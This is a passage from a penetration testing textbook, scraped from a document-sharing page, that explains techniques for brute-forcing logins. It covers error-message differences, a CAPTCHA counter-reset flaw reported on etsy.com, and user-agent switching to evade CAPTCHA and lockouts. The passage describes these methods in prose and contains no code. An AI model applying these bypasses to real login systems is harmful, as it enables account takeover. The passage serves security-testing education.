Ethical Hacking and Penetration Testing Guide
Submitting a correct password
Yüklə 22,44 Mb. Pdf görüntüsü
|
- Bu səhifədəki naviqasiya:
- Submitting a correct password
|
Submitting a correct password
When he submitted a correct password, no error was displayed. Based upon the error messages, an attacker could create a python/perl-based script to brute force the user accounts. 328 ◾ Ethical Hacking and Penetration Testing Guide CAPTCHA Reset Flaw Another issue, which I often test CAPTCHA against, is the counter reset flaw. This can be tested by sending a series of incorrect log-in attempts followed by a correct log-in attempt and see if CAPTCHA shows up or not. Let’s take a look at a real-world example of this reset bug, again in etsy.com, due to a weak CAPTCHA implementation. This bug was found by a security researcher with nickname “pwn- dizzle”; he discovered two issues while testing CAPTCHA’s implementation. The first issue he found was a 10 s delay, which occurred after the 20th unsuccessful attempt, which was being performed on a per-IP basis. The second issue he found was the CAPTCHA reset bug; after sending 20 unsuccessful log-in attempts, CAPTCHA was triggered. However, after sending 19 unsuccessful attempts with 1 suc- cessful attempt, neither was CAPTCHA triggered nor did a delay occur. Therefore, an attacker could exploit this by creating an account on etsy.com, to perform a successful log-in attempt. By using burp intruder or a custom script, he can perform a successful log-in attempt after every 19 requests. The screenshot tells the story: as we can see, after the 20th attempt, there is a delay of 10 s before another attempt is made. After the researcher sent a legitimate request on the 27th request, the delay reduced to 3 or 4 s. Web Hacking ◾ 329 Manipulating User-Agents to Bypass CAPTCHA and Other Protections Sometimes it’s possible to bypass CAPTCHA, account lockout policies, and IP-based restric- tions by manipulating user-agents. A user-agent is a set of information that your browser sends to the server; this information usually includes details about your browser version, your operat- ing system, etc. Custom user-agents can be defined by modifying the user-agent header from the http request; this can be easily done by using burp suite or by using a popular add-on in Firefox called “user- agent switcher,” which is probably a better option in my opinion, since it has built-in user-agents, which you can switch to. Along with it, we can also create our custom user-agent, which is not available by default. To create your custom user-agent, just navigate to “Options” under “User-Agent Switcher” menu and fill in the details. 330 ◾ Ethical Hacking and Penetration Testing Guide While testing CAPTCHA and other brute force protections, you should also check if any of the other user-agents are white listed, which can help you bypass other restrictions that are set against brute force attacks; normally, this is done with mobile user-agents. Yüklə 22,44 Mb. Dostları ilə paylaş:
|